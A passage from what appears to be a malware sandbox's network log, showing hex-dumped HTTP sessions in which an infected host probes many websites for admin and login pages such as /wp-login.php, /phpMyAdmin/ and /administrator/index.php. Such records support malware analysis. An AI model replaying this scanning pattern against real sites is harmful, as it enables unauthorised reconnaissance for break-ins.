                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b b0 a4 b8 db 6e 12 47 d6 61 af cd 01 01 7a d8 ee 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 8e a4 ac 18 b9 7c f7 05 45 c9 96 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 f9 f0 f3 fb bb af 9f 6e a0 b0 a5 48 47 c9 49 18 fe c6 73 10 16 6e 6f e0 e2 5b 0a 89 9b 00 2a 88 31 8b 40 aa f0 77 03 1c 7f 04 25 18 c7 00 04 91 cb 45 80 32 fc f2 39 48 21 39 f9 0d 25 e3 f9 b7 30 dc 42 75 38 00 c7 a1 2e be 0f ea f2 15 a8 cb ef 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 9f ac 45 69 b9 92 f0 2b fe bb e6 1a d9 09 fc 07 de 0b 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 97 bb bf 87 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 78 af a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca bf c2 2f 3f 85 ef 55 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d2 97 5d 9c 6d 5d 70 74 5e ce fe d4 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 47 6e 2c 4a d4 e3 b3 0f 3f ff a3 53 ce 47 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc db fa 96 8d cf bc 4d 48 04 6a 7b 36 b9 ee 56
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c9Xo8bnGaz6](YP|E${ 8|3fD:9nHGIsno[*1@w%E29H!9%0Bu8.Z8!J"HX:J,Ei+U\IFI-6hDam:"x@hX|z/?UY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV(Gn,J?SGE)8jXS.QhF{MHj{6V
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.371269941 CET1193INData Raw: f7 2b a3 36 af 88 71 53 09 b2 86 05 9c 65 42 d1 87 33 6f f7 3c 19 01 3c 8f 92 b8 4f ed a0 8a 46 a3 24 ee 0a c9 71 e7 92 4f 18 5f 75 fb 1f 36 9a 54 15 ea 20 6d e1 da 99 ae 48 69 ee 43 82 fe 21 6c 37 c8 0d bb 88 db 71 a7 a4 41 0e 01 30 62 49 68 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: +6qSeB3o<<OF$qO_u6T mHiC!l7qA0bIh5F' ]&JbW8[/!CKp5ngb/Tic?yBkuA-nz= +QBk, Sg[TD=_VJ j UgP*LR.V
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.371304035 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                412192.168.2.663136104.21.14.24580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.244282961 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.374108076 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WShCCdEuIoeCetWXsBDmiHGqYSfQsGOsaR5pdJeyJbadfBSi7w%2FXKID1Y16zzUK7qxGwUAJLV%2F4LZLr7Dufyfj0LPNMn93Qpr8Co4RmCopJsxj3JBVyMmp5m2oCYrXMqZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd499b504576-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c c9 de 4b 2e 6f b2 8a eb 6e 0a 04 d8 e2 f6 6e b3 68 17 87 45 40 91 23 8b 17 8a 54 49 ca 8a 91 e6 bf 1f 28 4a 8e fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 d1 87 9f df df 7d fd 74 03 85 2d 45 3a 4a 8e c2 f0 37 9e 83 b0 70 7b 03 e7 df 52 48 dc 04 50 41 8c 59 04 52 85 bf 1b e0 f8 23 28 c1 38 06 20 88 5c 2e 02 94 e1 97 cf 41 0a c9 d1 6f 28 19 cf bf 85 e1 0b 54 87 03 70 18 ea fc fb a0 2e de 80 ba f8 0e a8 a5 ed d0 dc 8b 43 59 ee a3 84 e1 36 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e2 bf 6b ae 91 1d c1 7f e0 bd 50 35 cb 05 d1 98 c4 de 6e 94 94 68 09 d0 82 68 83 76 11 7c b9 fb 7b 78 11 40 dc 4f 14 d6 56 a1 43 58 2d 82 f7 4a 3a d0 f0 6e 5d 61 00 d4 8f 16 81 c5 47 1b bb 78 af 37 30 6f a1 fc 2b fc f2 53 f8 5e 95 15 b1 3c 13 43 a0 db 9b c5 0d 5b e2 60 9d 24 25 2e 02 ad 32 65 cd c0 50 2a 2e 19 3e 4e 41 aa 5c 09 a1 9a bd 25 2b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 82 e1 8a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 62 ee 51 04 97 0f a0 51 2c 02 63 d7 02 4d 81 68 03 e0 6c 11 d0 fc de bf 0a a9 31 01 14 1a f3 45 10 53 26 43 ba e4 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a 77 35 7c f9 2d 7d dd c5 c9 8b 0b 8e ce cb c9 9f 7a e1 d8 3b da 56 43 6b 98 66 8a ad 9f 4a a2 97 5c 5e cd ae 2b c2 18 97 cb ab d9 73 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 47 92 ac f8 92 58 a5 23 aa d4 03 c7 1b 49 32 81 6c 02 4f 23 57 02 0d 97 4c 35 11 61 ec 66 85 d2 7e e4 c6 a2 44 3d 3e f9 f0 f3 3f 3a e5 7c 54 84 21 3b 99 42 5e 4b da 8a 73 dc af 06 58 11 0d 1d b0 80 05 30 45 eb 12 a5 8d 96 68 6f 04 ba c7 bf ad 6f d9 f8 c4 db 84 44 a0 b6 27 93 eb 6e 75 bf 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c9Xmo_1Q,K.onnhE@#TI(J\- 8|f3#}t-E:J7p{RHPAYR#(8 \.Ao(Tp.CY6Rr+0Z+kP5nhhv|{x@OVCX-J:n]aGx70o+S^<C[`$%.2eP*.>NA\%+M,j8SKn9DbQQ,cMhl1ES&CiJ5w5|-}z;VCkfJ\^+sh@tgGW6GX#I2lO#WL5af~D=>?:|T!;B^KsX0EhooD'nu2
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.374149084 CET1191INData Raw: 6a f3 8a 18 37 95 20 6b 58 c0 49 26 14 7d 38 f1 76 cf 93 11 c0 f3 28 89 fb d4 f6 aa 68 34 4a e2 ae 90 1c 77 2e f9 84 f1 55 b7 ff 61 a3 49 55 a1 0e d2 16 ae 9d e9 8a 94 e6 3e 24 e8 1f c2 76 83 dc b0 8b b8 1d 77 4a 1a e4 10 00 23 96 84 56 13 69 04
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: j7 kXI&}8v(h4Jw.UaIU>$vwJ#ViJ{L~Hej$f|52W3&vKv;6GP+6K]%~.1H?+SXB%F"1u=W{B)_UD#L;\^^^FTI\R4q G
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.374197960 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                413192.168.2.66300531.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.246171951 CET169OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.446106911 CET160INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                414192.168.2.663010178.16.128.18180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.246232033 CET173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.440709114 CET1016INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                415192.168.2.662974188.212.100.15480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.250261068 CET172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.486197948 CET1030INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:33 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                416192.168.2.662976188.212.100.15480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.251192093 CET184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.486711979 CET1042INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:33 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                417192.168.2.663001185.120.71.2480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.257843971 CET185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.467638016 CET393INHTTP/1.1 301 Moved Permanently
